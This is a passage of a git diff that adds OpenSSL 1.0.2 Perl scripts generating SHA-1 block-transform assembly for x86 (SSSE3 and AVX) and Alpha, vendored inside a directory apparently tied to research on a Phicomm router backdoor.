+	return &body_40_59()	if ($rx==39);	$rx++;
+	(
+	'($a,$b,$c,$d,$e)=@V;'.
+	'&add	($e,&DWP(4*($j&15),"esp"));',	# X[]+K xfer
+	'&xor	(@T[0],$d)	if($j==19);'.
+	'&xor	(@T[0],$c)	if($j> 19);',	# ($b^$d^$c)
+	'&mov	(@T[1],$a);',	# $b in next round
+
+	'&$_rol	($a,5);',
+	'&add	($e,@T[0]);',
+	'&xor	(@T[1],$c)	if ($j< 79);',	# $b^$d for next round
+
+	'&$_ror	($b,7);',	# $b>>>2
+	'&add	($e,$a);'	.'$j++; unshift(@V,pop(@V)); unshift(@T,pop(@T));'
+	);
+}
+
+sub body_40_59 () {	# ((b^c)&(c^d))^c
+	# on entry @T[0]=(b^c), (c^=d)
+	$rx++;
+	(
+	'($a,$b,$c,$d,$e)=@V;'.
+	'&add	($e,&DWP(4*($j&15),"esp"));',	# X[]+K xfer
+	'&and	(@T[0],$c)	if ($j>=40);',	# (b^c)&(c^d)
+	'&xor	($c,$d)		if ($j>=40);',	# restore $c
+
+	'&$_ror	($b,7);',	# $b>>>2
+	'&mov	(@T[1],$a);',	# $b for next round
+	'&xor	(@T[0],$c);',
+
+	'&$_rol	($a,5);',
+	'&add	($e,@T[0]);',
+	'&xor	(@T[1],$c)	if ($j==59);'.
+	'&xor	(@T[1],$b)	if ($j< 59);',	# b^c for next round
+
+	'&xor	($b,$c)		if ($j< 59);',	# c^d for next round
+	'&add	($e,$a);'	.'$j++; unshift(@V,pop(@V)); unshift(@T,pop(@T));'
+	);
+}
+######
+sub bodyx_00_19 () {	# ((c^d)&b)^d
+	# on start @T[0]=(b&c)^(~b&d), $e+=X[]+K
+	return &bodyx_20_39()	if ($rx==19);	$rx++;
+	(
+	'($a,$b,$c,$d,$e)=@V;'.
+
+	'&rorx	($b,$b,2)			if ($j==0);'.	# $b>>>2
+	'&rorx	($b,@T[1],7)			if ($j!=0);',	# $b>>>2
+	'&lea	($e,&DWP(0,$e,@T[0]));',
+	'&rorx	(@T[0],$a,5);',
+
+	'&andn	(@T[1],$a,$c);',
+	'&and	($a,$b)',
+	'&add	($d,&DWP(4*(($j+1)&15),"esp"));',	# X[]+K xfer
+
+	'&xor	(@T[1],$a)',
+	'&add	($e,@T[0]);'	.'$j++; unshift(@V,pop(@V)); unshift(@T,pop(@T));'
+	);
+}
+
+sub bodyx_20_39 () {	# b^d^c
+	# on start $b=b^c^d
+	return &bodyx_40_59()	if ($rx==39);	$rx++;
+	(
+	'($a,$b,$c,$d,$e)=@V;'.
+
+	'&add	($e,($j==19?@T[0]:$b))',
+	'&rorx	($b,@T[1],7);',	# $b>>>2
+	'&rorx	(@T[0],$a,5);',
+
+	'&xor	($a,$b)				if ($j<79);',
+	'&add	($d,&DWP(4*(($j+1)&15),"esp"))	if ($j<79);',	# X[]+K xfer
+	'&xor	($a,$c)				if ($j<79);',
+	'&add	($e,@T[0]);'	.'$j++; unshift(@V,pop(@V)); unshift(@T,pop(@T));'
+	);
+}
+
+sub bodyx_40_59 () {	# ((b^c)&(c^d))^c
+	# on start $b=((b^c)&(c^d))^c
+	return &bodyx_20_39()	if ($rx==59);	$rx++;
+	(
+	'($a,$b,$c,$d,$e)=@V;'.
+
+	'&rorx	(@T[0],$a,5)',
+	'&lea	($e,&DWP(0,$e,$b))',
+	'&rorx	($b,@T[1],7)',	# $b>>>2
+	'&add	($d,&DWP(4*(($j+1)&15),"esp"))',	# X[]+K xfer
+
+	'&mov	(@T[1],$c)',
+	'&xor	($a,$b)',	# b^c for next round
+	'&xor	(@T[1],$b)',	# c^d for next round
+
+	'&and	($a,@T[1])',
+	'&add	($e,@T[0])',
+	'&xor	($a,$b)'	.'$j++; unshift(@V,pop(@V)); unshift(@T,pop(@T));'
+	);
+}
+
+&set_label("loop",16);
+	&Xupdate_ssse3_16_31(\&body_00_19);
+	&Xupdate_ssse3_16_31(\&body_00_19);
+	&Xupdate_ssse3_16_31(\&body_00_19);
+	&Xupdate_ssse3_16_31(\&body_00_19);
+	&Xupdate_ssse3_32_79(\&body_00_19);
+	&Xupdate_ssse3_32_79(\&body_20_39);
+	&Xupdate_ssse3_32_79(\&body_20_39);
+	&Xupdate_ssse3_32_79(\&body_20_39);
+	&Xupdate_ssse3_32_79(\&body_20_39);
+	&Xupdate_ssse3_32_79(\&body_20_39);
+	&Xupdate_ssse3_32_79(\&body_40_59);
+	&Xupdate_ssse3_32_79(\&body_40_59);
+	&Xupdate_ssse3_32_79(\&body_40_59);
+	&Xupdate_ssse3_32_79(\&body_40_59);
+	&Xupdate_ssse3_32_79(\&body_40_59);
+	&Xupdate_ssse3_32_79(\&body_20_39);
+	&Xuplast_ssse3_80(\&body_20_39);	# can jump to "done"
+
+				$saved_j=$j; @saved_V=@V;
+
+	&Xloop_ssse3(\&body_20_39);
+	&Xloop_ssse3(\&body_20_39);
+	&Xloop_ssse3(\&body_20_39);
+
+	&mov	(@T[1],&DWP(192,"esp"));	# update context
+	&add	($A,&DWP(0,@T[1]));
+	&add	(@T[0],&DWP(4,@T[1]));		# $b
+	&add	($C,&DWP(8,@T[1]));
+	&mov	(&DWP(0,@T[1]),$A);
+	&add	($D,&DWP(12,@T[1]));
+	&mov	(&DWP(4,@T[1]),@T[0]);
+	&add	($E,&DWP(16,@T[1]));
+	&mov	(&DWP(8,@T[1]),$C);
+	&mov	($B,$C);
+	&mov	(&DWP(12,@T[1]),$D);
+	&xor	($B,$D);
+	&mov	(&DWP(16,@T[1]),$E);
+	&mov	(@T[1],@T[0]);
+	&pshufd	(@X[0],@X[-4&7],0xee);		# was &movdqa	(@X[0],@X[-3&7]);
+	&and	(@T[0],$B);
+	&mov	($B,$T[1]);
+
+	&jmp	(&label("loop"));
+
+&set_label("done",16);		$j=$saved_j; @V=@saved_V;
+
+	&Xtail_ssse3(\&body_20_39);
+	&Xtail_ssse3(\&body_20_39);
+	&Xtail_ssse3(\&body_20_39);
+
+	&mov	(@T[1],&DWP(192,"esp"));	# update context
+	&add	($A,&DWP(0,@T[1]));
+	&mov	("esp",&DWP(192+12,"esp"));	# restore %esp
+	&add	(@T[0],&DWP(4,@T[1]));		# $b
+	&add	($C,&DWP(8,@T[1]));
+	&mov	(&DWP(0,@T[1]),$A);
+	&add	($D,&DWP(12,@T[1]));
+	&mov	(&DWP(4,@T[1]),@T[0]);
+	&add	($E,&DWP(16,@T[1]));
+	&mov	(&DWP(8,@T[1]),$C);
+	&mov	(&DWP(12,@T[1]),$D);
+	&mov	(&DWP(16,@T[1]),$E);
+
+&function_end("_sha1_block_data_order_ssse3");
+
+$rx=0;	# reset
+
+if ($ymm) {
+my $Xi=4;			# 4xSIMD Xupdate round, start pre-seeded
+my @X=map("xmm$_",(4..7,0..3));	# pre-seeded for $Xi=4
+my @V=($A,$B,$C,$D,$E);
+my $j=0;			# hash round
+my @T=($T,$tmp1);
+my $inp;
+
+my $_rol=sub { &shld(@_[0],@_) };
+my $_ror=sub { &shrd(@_[0],@_) };
+
+&function_begin("_sha1_block_data_order_avx");
+	&call	(&label("pic_point"));	# make it PIC!
+	&set_label("pic_point");
+	&blindpop($tmp1);
+	&lea	($tmp1,&DWP(&label("K_XX_XX")."-".&label("pic_point"),$tmp1));
+&set_label("avx_shortcut");
+	&vzeroall();
+
+	&vmovdqa(@X[3],&QWP(0,$tmp1));		# K_00_19
+	&vmovdqa(@X[4],&QWP(16,$tmp1));		# K_20_39
+	&vmovdqa(@X[5],&QWP(32,$tmp1));		# K_40_59
+	&vmovdqa(@X[6],&QWP(48,$tmp1));		# K_60_79
+	&vmovdqa(@X[2],&QWP(64,$tmp1));		# pbswap mask
+
+	&mov	($E,&wparam(0));		# load argument block
+	&mov	($inp=@T[1],&wparam(1));
+	&mov	($D,&wparam(2));
+	&mov	(@T[0],"esp");
+
+	# stack frame layout
+	#
+	# +0	X[0]+K	X[1]+K	X[2]+K	X[3]+K	# XMM->IALU xfer area
+	#	X[4]+K	X[5]+K	X[6]+K	X[7]+K
+	#	X[8]+K	X[9]+K	X[10]+K	X[11]+K
+	#	X[12]+K	X[13]+K	X[14]+K	X[15]+K
+	#
+	# +64	X[0]	X[1]	X[2]	X[3]	# XMM->XMM backtrace area
+	#	X[4]	X[5]	X[6]	X[7]
+	#	X[8]	X[9]	X[10]	X[11]	# even borrowed for K_00_19
+	#
+	# +112	K_20_39	K_20_39	K_20_39	K_20_39	# constants
+	#	K_40_59	K_40_59	K_40_59	K_40_59
+	#	K_60_79	K_60_79	K_60_79	K_60_79
+	#	K_00_19	K_00_19	K_00_19	K_00_19
+	#	pbswap mask
+	#
+	# +192	ctx				# argument block
+	# +196	inp
+	# +200	end
+	# +204	esp
+	&sub	("esp",208);
+	&and	("esp",-64);
+
+	&vmovdqa(&QWP(112+0,"esp"),@X[4]);	# copy constants
+	&vmovdqa(&QWP(112+16,"esp"),@X[5]);
+	&vmovdqa(&QWP(112+32,"esp"),@X[6]);
+	&shl	($D,6);				# len*64
+	&vmovdqa(&QWP(112+48,"esp"),@X[3]);
+	&add	($D,$inp);			# end of input
+	&vmovdqa(&QWP(112+64,"esp"),@X[2]);
+	&add	($inp,64);
+	&mov	(&DWP(192+0,"esp"),$E);		# save argument block
+	&mov	(&DWP(192+4,"esp"),$inp);
+	&mov	(&DWP(192+8,"esp"),$D);
+	&mov	(&DWP(192+12,"esp"),@T[0]);	# save original %esp
+
+	&mov	($A,&DWP(0,$E));		# load context
+	&mov	($B,&DWP(4,$E));
+	&mov	($C,&DWP(8,$E));
+	&mov	($D,&DWP(12,$E));
+	&mov	($E,&DWP(16,$E));
+	&mov	(@T[0],$B);			# magic seed
+
+	&vmovdqu(@X[-4&7],&QWP(-64,$inp));	# load input to %xmm[0-3]
+	&vmovdqu(@X[-3&7],&QWP(-48,$inp));
+	&vmovdqu(@X[-2&7],&QWP(-32,$inp));
+	&vmovdqu(@X[-1&7],&QWP(-16,$inp));
+	&vpshufb(@X[-4&7],@X[-4&7],@X[2]);	# byte swap
+	&vpshufb(@X[-3&7],@X[-3&7],@X[2]);
+	&vpshufb(@X[-2&7],@X[-2&7],@X[2]);
+	&vmovdqa(&QWP(112-16,"esp"),@X[3]);	# borrow last backtrace slot
+	&vpshufb(@X[-1&7],@X[-1&7],@X[2]);
+	&vpaddd	(@X[0],@X[-4&7],@X[3]);		# add K_00_19
+	&vpaddd	(@X[1],@X[-3&7],@X[3]);
+	&vpaddd	(@X[2],@X[-2&7],@X[3]);
+	&vmovdqa(&QWP(0,"esp"),@X[0]);		# X[]+K xfer to IALU
+	&mov	(@T[1],$C);
+	&vmovdqa(&QWP(0+16,"esp"),@X[1]);
+	&xor	(@T[1],$D);
+	&vmovdqa(&QWP(0+32,"esp"),@X[2]);
+	&and	(@T[0],@T[1]);
+	&jmp	(&label("loop"));
+
+sub Xupdate_avx_16_31()		# recall that $Xi starts wtih 4
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 40 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vpalignr(@X[0],@X[-3&7],@X[-4&7],8);	# compose "X[-14]" in "X[0]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	  &vpaddd	(@X[3],@X[3],@X[-1&7]);
+	  &vmovdqa	(&QWP(64+16*(($Xi-4)%3),"esp"),@X[-4&7]);# save X[] to backtrace buffer
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vpsrldq(@X[2],@X[-1&7],4);		# "X[-3]", 3 dwords
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vpxor	(@X[0],@X[0],@X[-4&7]);		# "X[0]"^="X[-16]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpxor	(@X[2],@X[2],@X[-2&7]);		# "X[-3]"^"X[-8]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &vmovdqa	(&QWP(0+16*(($Xi-1)&3),"esp"),@X[3]);	# X[]+K xfer to IALU
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpxor	(@X[0],@X[0],@X[2]);		# "X[0]"^="X[-3]"^"X[-8]"
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpsrld	(@X[2],@X[0],31);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpslldq(@X[4],@X[0],12);		# "X[0]"<<96, extract one dword
+	&vpaddd	(@X[0],@X[0],@X[0]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpsrld	(@X[3],@X[4],30);
+	&vpor	(@X[0],@X[0],@X[2]);		# "X[0]"<<<=1
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpslld	(@X[4],@X[4],2);
+	  &vmovdqa	(@X[2],&QWP(64+16*(($Xi-6)%3),"esp")) if ($Xi>5);	# restore X[] from backtrace buffer
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vpxor	(@X[0],@X[0],@X[3]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	&vpxor	(@X[0],@X[0],@X[4]);		# "X[0]"^=("X[0]"<<96)<<<2
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	  &vmovdqa	(@X[4],&QWP(112-16+16*(($Xi)/5),"esp"));	# K_XX_XX
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	 foreach (@insns) { eval; }	# remaining instructions [if any]
+
+  $Xi++;	push(@X,shift(@X));	# "rotate" X[]
+}
+
+sub Xupdate_avx_32_79()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 to 44 instructions
+  my ($a,$b,$c,$d,$e);
+
+	&vpalignr(@X[2],@X[-1&7],@X[-2&7],8);	# compose "X[-6]"
+	&vpxor	(@X[0],@X[0],@X[-4&7]);	# "X[0]"="X[-32]"^"X[-16]"
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+
+	&vpxor	(@X[0],@X[0],@X[-7&7]);	# "X[0]"^="X[-28]"
+	  &vmovdqa	(&QWP(64+16*(($Xi-4)%3),"esp"),@X[-4&7]);	# save X[] to backtrace buffer
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 if ($Xi%5) {
+	  &vmovdqa	(@X[4],@X[3]);	# "perpetuate" K_XX_XX...
+	 } else {			# ... or load next one
+	  &vmovdqa	(@X[4],&QWP(112-16+16*($Xi/5),"esp"));
+	 }
+	  &vpaddd	(@X[3],@X[3],@X[-1&7]);
+	 eval(shift(@insns));		# ror
+	 eval(shift(@insns));
+
+	&vpxor	(@X[0],@X[0],@X[2]);		# "X[0]"^="X[-6]"
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+
+	&vpsrld	(@X[2],@X[0],30);
+	  &vmovdqa	(&QWP(0+16*(($Xi-1)&3),"esp"),@X[3]);	# X[]+K xfer to IALU
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+	 eval(shift(@insns));
+
+	&vpslld	(@X[0],@X[0],2);
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+	 eval(shift(@insns));
+
+	&vpor	(@X[0],@X[0],@X[2]);	# "X[0]"<<<=2
+	 eval(shift(@insns));		# body_20_39
+	 eval(shift(@insns));
+	  &vmovdqa	(@X[2],&QWP(64+16*(($Xi-6)%3),"esp")) if($Xi<19);	# restore X[] from backtrace buffer
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# rol
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));		# ror
+	 eval(shift(@insns));
+
+	 foreach (@insns) { eval; }	# remaining instructions
+
+  $Xi++;	push(@X,shift(@X));	# "rotate" X[]
+}
+
+sub Xuplast_avx_80()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns));
+	  &vpaddd	(@X[3],@X[3],@X[-1&7]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	  &vmovdqa	(&QWP(0+16*(($Xi-1)&3),"esp"),@X[3]);	# X[]+K xfer IALU
+
+	 foreach (@insns) { eval; }		# remaining instructions
+
+	&mov	($inp=@T[1],&DWP(192+4,"esp"));
+	&cmp	($inp,&DWP(192+8,"esp"));
+	&je	(&label("done"));
+
+	&vmovdqa(@X[3],&QWP(112+48,"esp"));	# K_00_19
+	&vmovdqa(@X[2],&QWP(112+64,"esp"));	# pbswap mask
+	&vmovdqu(@X[-4&7],&QWP(0,$inp));	# load input
+	&vmovdqu(@X[-3&7],&QWP(16,$inp));
+	&vmovdqu(@X[-2&7],&QWP(32,$inp));
+	&vmovdqu(@X[-1&7],&QWP(48,$inp));
+	&add	($inp,64);
+	&vpshufb(@X[-4&7],@X[-4&7],@X[2]);		# byte swap
+	&mov	(&DWP(192+4,"esp"),$inp);
+	&vmovdqa(&QWP(112-16,"esp"),@X[3]);	# borrow last backtrace slot
+
+  $Xi=0;
+}
+
+sub Xloop_avx()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 instructions
+  my ($a,$b,$c,$d,$e);
+
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vpshufb	(@X[($Xi-3)&7],@X[($Xi-3)&7],@X[2]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vpaddd	(@X[$Xi&7],@X[($Xi-4)&7],@X[3]);
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+	&vmovdqa	(&QWP(0+16*$Xi,"esp"),@X[$Xi&7]);	# X[]+K xfer to IALU
+	 eval(shift(@insns));
+	 eval(shift(@insns));
+
+	foreach (@insns) { eval; }
+  $Xi++;
+}
+
+sub Xtail_avx()
+{ use integer;
+  my $body = shift;
+  my @insns = (&$body,&$body,&$body,&$body);	# 32 instructions
+  my ($a,$b,$c,$d,$e);
+
+	foreach (@insns) { eval; }
+}
+
+&set_label("loop",16);
+	&Xupdate_avx_16_31(\&body_00_19);
+	&Xupdate_avx_16_31(\&body_00_19);
+	&Xupdate_avx_16_31(\&body_00_19);
+	&Xupdate_avx_16_31(\&body_00_19);
+	&Xupdate_avx_32_79(\&body_00_19);
+	&Xupdate_avx_32_79(\&body_20_39);
+	&Xupdate_avx_32_79(\&body_20_39);
+	&Xupdate_avx_32_79(\&body_20_39);
+	&Xupdate_avx_32_79(\&body_20_39);
+	&Xupdate_avx_32_79(\&body_20_39);
+	&Xupdate_avx_32_79(\&body_40_59);
+	&Xupdate_avx_32_79(\&body_40_59);
+	&Xupdate_avx_32_79(\&body_40_59);
+	&Xupdate_avx_32_79(\&body_40_59);
+	&Xupdate_avx_32_79(\&body_40_59);
+	&Xupdate_avx_32_79(\&body_20_39);
+	&Xuplast_avx_80(\&body_20_39);	# can jump to "done"
+
+				$saved_j=$j; @saved_V=@V;
+
+	&Xloop_avx(\&body_20_39);
+	&Xloop_avx(\&body_20_39);
+	&Xloop_avx(\&body_20_39);
+
+	&mov	(@T[1],&DWP(192,"esp"));	# update context
+	&add	($A,&DWP(0,@T[1]));
+	&add	(@T[0],&DWP(4,@T[1]));		# $b
+	&add	($C,&DWP(8,@T[1]));
+	&mov	(&DWP(0,@T[1]),$A);
+	&add	($D,&DWP(12,@T[1]));
+	&mov	(&DWP(4,@T[1]),@T[0]);
+	&add	($E,&DWP(16,@T[1]));
+	&mov	($B,$C);
+	&mov	(&DWP(8,@T[1]),$C);
+	&xor	($B,$D);
+	&mov	(&DWP(12,@T[1]),$D);
+	&mov	(&DWP(16,@T[1]),$E);
+	&mov	(@T[1],@T[0]);
+	&and	(@T[0],$B);
+	&mov	($B,@T[1]);
+
+	&jmp	(&label("loop"));
+
+&set_label("done",16);		$j=$saved_j; @V=@saved_V;
+
+	&Xtail_avx(\&body_20_39);
+	&Xtail_avx(\&body_20_39);
+	&Xtail_avx(\&body_20_39);
+
+	&vzeroall();
+
+	&mov	(@T[1],&DWP(192,"esp"));	# update context
+	&add	($A,&DWP(0,@T[1]));
+	&mov	("esp",&DWP(192+12,"esp"));	# restore %esp
+	&add	(@T[0],&DWP(4,@T[1]));		# $b
+	&add	($C,&DWP(8,@T[1]));
+	&mov	(&DWP(0,@T[1]),$A);
+	&add	($D,&DWP(12,@T[1]));
+	&mov	(&DWP(4,@T[1]),@T[0]);
+	&add	($E,&DWP(16,@T[1]));
+	&mov	(&DWP(8,@T[1]),$C);
+	&mov	(&DWP(12,@T[1]),$D);
+	&mov	(&DWP(16,@T[1]),$E);
+&function_end("_sha1_block_data_order_avx");
+}
+&set_label("K_XX_XX",64);
+&data_word(0x5a827999,0x5a827999,0x5a827999,0x5a827999);	# K_00_19
+&data_word(0x6ed9eba1,0x6ed9eba1,0x6ed9eba1,0x6ed9eba1);	# K_20_39
+&data_word(0x8f1bbcdc,0x8f1bbcdc,0x8f1bbcdc,0x8f1bbcdc);	# K_40_59
+&data_word(0xca62c1d6,0xca62c1d6,0xca62c1d6,0xca62c1d6);	# K_60_79
+&data_word(0x00010203,0x04050607,0x08090a0b,0x0c0d0e0f);	# pbswap mask
+&data_byte(0xf,0xe,0xd,0xc,0xb,0xa,0x9,0x8,0x7,0x6,0x5,0x4,0x3,0x2,0x1,0x0);
+}
+&asciz("SHA1 block transform for x86, CRYPTOGAMS by <appro\@openssl.org>");
+
+&asm_finish();
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-alpha.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-alpha.pl
new file mode 100644
index 0000000..6c4b925
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha1-alpha.pl
@@ -0,0 +1,322 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# SHA1 block procedure for Alpha.
+
+# On 21264 performance is 33% better than code generated by vendor
+# compiler, and 75% better than GCC [3.4], and in absolute terms is
+# 8.7 cycles per processed byte. Implementation features vectorized
+# byte swap, but not Xupdate.
+
+@X=(	"\$0",	"\$1",	"\$2",	"\$3",	"\$4",	"\$5",	"\$6",	"\$7",
+	"\$8",	"\$9",	"\$10",	"\$11",	"\$12",	"\$13",	"\$14",	"\$15");
+$ctx="a0";	# $16
+$inp="a1";
+$num="a2";
+$A="a3";
+$B="a4";	# 20
+$C="a5";
+$D="t8";
+$E="t9";	@V=($A,$B,$C,$D,$E);
+$t0="t10";	# 24
+$t1="t11";
+$t2="ra";
+$t3="t12";
+$K="AT";	# 28
+
+sub BODY_00_19 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i+1;
+$code.=<<___ if ($i==0);
+	ldq_u	@X[0],0+0($inp)
+	ldq_u	@X[1],0+7($inp)
+___
+$code.=<<___ if (!($i&1) && $i<14);
+	ldq_u	@X[$i+2],($i+2)*4+0($inp)
+	ldq_u	@X[$i+3],($i+2)*4+7($inp)
+___
+$code.=<<___ if (!($i&1) && $i<15);
+	extql	@X[$i],$inp,@X[$i]
+	extqh	@X[$i+1],$inp,@X[$i+1]
+
+	or	@X[$i+1],@X[$i],@X[$i]	# pair of 32-bit values are fetched
+
+	srl	@X[$i],24,$t0		# vectorized byte swap
+	srl	@X[$i],8,$t2
+
+	sll	@X[$i],8,$t3
+	sll	@X[$i],24,@X[$i]
+	zapnot	$t0,0x11,$t0
+	zapnot	$t2,0x22,$t2
+
+	zapnot	@X[$i],0x88,@X[$i]
+	or	$t0,$t2,$t0
+	zapnot	$t3,0x44,$t3
+	sll	$a,5,$t1
+
+	or	@X[$i],$t0,@X[$i]
+	addl	$K,$e,$e
+	and	$b,$c,$t2
+	zapnot	$a,0xf,$a
+
+	or	@X[$i],$t3,@X[$i]
+	srl	$a,27,$t0
+	bic	$d,$b,$t3
+	sll	$b,30,$b
+
+	extll	@X[$i],4,@X[$i+1]	# extract upper half
+	or	$t2,$t3,$t2
+	addl	@X[$i],$e,$e
+
+	addl	$t1,$e,$e
+	srl	$b,32,$t3
+	zapnot	@X[$i],0xf,@X[$i]
+
+	addl	$t0,$e,$e
+	addl	$t2,$e,$e
+	or	$t3,$b,$b
+___
+$code.=<<___ if (($i&1) && $i<15);
+	sll	$a,5,$t1
+	addl	$K,$e,$e
+	and	$b,$c,$t2
+	zapnot	$a,0xf,$a
+
+	srl	$a,27,$t0
+	addl	@X[$i%16],$e,$e
+	bic	$d,$b,$t3
+	sll	$b,30,$b
+
+	or	$t2,$t3,$t2
+	addl	$t1,$e,$e
+	srl	$b,32,$t3
+	zapnot	@X[$i],0xf,@X[$i]
+
+	addl	$t0,$e,$e
+	addl	$t2,$e,$e
+	or	$t3,$b,$b
+___
+$code.=<<___ if ($i>=15);	# with forward Xupdate
+	sll	$a,5,$t1
+	addl	$K,$e,$e
+	and	$b,$c,$t2
+	xor	@X[($j+2)%16],@X[$j%16],@X[$j%16]
+
+	zapnot	$a,0xf,$a
+	addl	@X[$i%16],$e,$e
+	bic	$d,$b,$t3
+	xor	@X[($j+8)%16],@X[$j%16],@X[$j%16]
+
+	srl	$a,27,$t0
+	addl	$t1,$e,$e
+	or	$t2,$t3,$t2
+	xor	@X[($j+13)%16],@X[$j%16],@X[$j%16]
+
+	sll	$b,30,$b
+	addl	$t0,$e,$e
+	srl	@X[$j%16],31,$t1
+
+	addl	$t2,$e,$e
+	srl	$b,32,$t3
+	addl	@X[$j%16],@X[$j%16],@X[$j%16]
+
+	or	$t3,$b,$b
+	zapnot	@X[$i%16],0xf,@X[$i%16]
+	or	$t1,@X[$j%16],@X[$j%16]
+___
+}
+
+sub BODY_20_39 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i+1;
+$code.=<<___ if ($i<79);	# with forward Xupdate
+	sll	$a,5,$t1
+	addl	$K,$e,$e
+	zapnot	$a,0xf,$a
+	xor	@X[($j+2)%16],@X[$j%16],@X[$j%16]
+
+	sll	$b,30,$t3
+	addl	$t1,$e,$e
+	xor	$b,$c,$t2
+	xor	@X[($j+8)%16],@X[$j%16],@X[$j%16]
+
+	srl	$b,2,$b
+	addl	@X[$i%16],$e,$e
+	xor	$d,$t2,$t2
+	xor	@X[($j+13)%16],@X[$j%16],@X[$j%16]
+
+	srl	@X[$j%16],31,$t1
+	addl	$t2,$e,$e
+	srl	$a,27,$t0
+	addl	@X[$j%16],@X[$j%16],@X[$j%16]
+
+	or	$t3,$b,$b
+	addl	$t0,$e,$e
+	or	$t1,@X[$j%16],@X[$j%16]
+___
+$code.=<<___ if ($i<77);
+	zapnot	@X[$i%16],0xf,@X[$i%16]
+___
+$code.=<<___ if ($i==79);	# with context fetch
+	sll	$a,5,$t1
+	addl	$K,$e,$e
+	zapnot	$a,0xf,$a
+	ldl	@X[0],0($ctx)
+
+	sll	$b,30,$t3
+	addl	$t1,$e,$e
+	xor	$b,$c,$t2
+	ldl	@X[1],4($ctx)
+
+	srl	$b,2,$b
+	addl	@X[$i%16],$e,$e
+	xor	$d,$t2,$t2
+	ldl	@X[2],8($ctx)
+
+	srl	$a,27,$t0
+	addl	$t2,$e,$e
+	ldl	@X[3],12($ctx)
+
+	or	$t3,$b,$b
+	addl	$t0,$e,$e
+	ldl	@X[4],16($ctx)
+___
+}
+
+sub BODY_40_59 {
+my ($i,$a,$b,$c,$d,$e)=@_;
+my $j=$i+1;
+$code.=<<___;	# with forward Xupdate
+	sll	$a,5,$t1
+	addl	$K,$e,$e
+	zapnot	$a,0xf,$a
+	xor	@X[($j+2)%16],@X[$j%16],@X[$j%16]
+
+	srl	$a,27,$t0
+	and	$b,$c,$t2
+	and	$b,$d,$t3
+	xor	@X[($j+8)%16],@X[$j%16],@X[$j%16]
+
+	sll	$b,30,$b
+	addl	$t1,$e,$e
+	xor	@X[($j+13)%16],@X[$j%16],@X[$j%16]
+
+	srl	@X[$j%16],31,$t1
+	addl	$t0,$e,$e
+	or	$t2,$t3,$t2
+	and	$c,$d,$t3
+
+	or	$t2,$t3,$t2
+	srl	$b,32,$t3
+	addl	@X[$i%16],$e,$e
+	addl	@X[$j%16],@X[$j%16],@X[$j%16]
+
+	or	$t3,$b,$b
+	addl	$t2,$e,$e
+	or	$t1,@X[$j%16],@X[$j%16]
+	zapnot	@X[$i%16],0xf,@X[$i%16]
+___
+}
+
+$code=<<___;
+#ifdef __linux__
+#include <asm/regdef.h>
+#else
+#include <asm.h>
+#include <regdef.h>
+#endif
+
+.text
+
+.set	noat
+.set	noreorder
+.globl	sha1_block_data_order
+.align	5
+.ent	sha1_block_data_order
+sha1_block_data_order:
+	lda	sp,-64(sp)
+	stq	ra,0(sp)
+	stq	s0,8(sp)
+	stq	s1,16(sp)
+	stq	s2,24(sp)
+	stq	s3,32(sp)
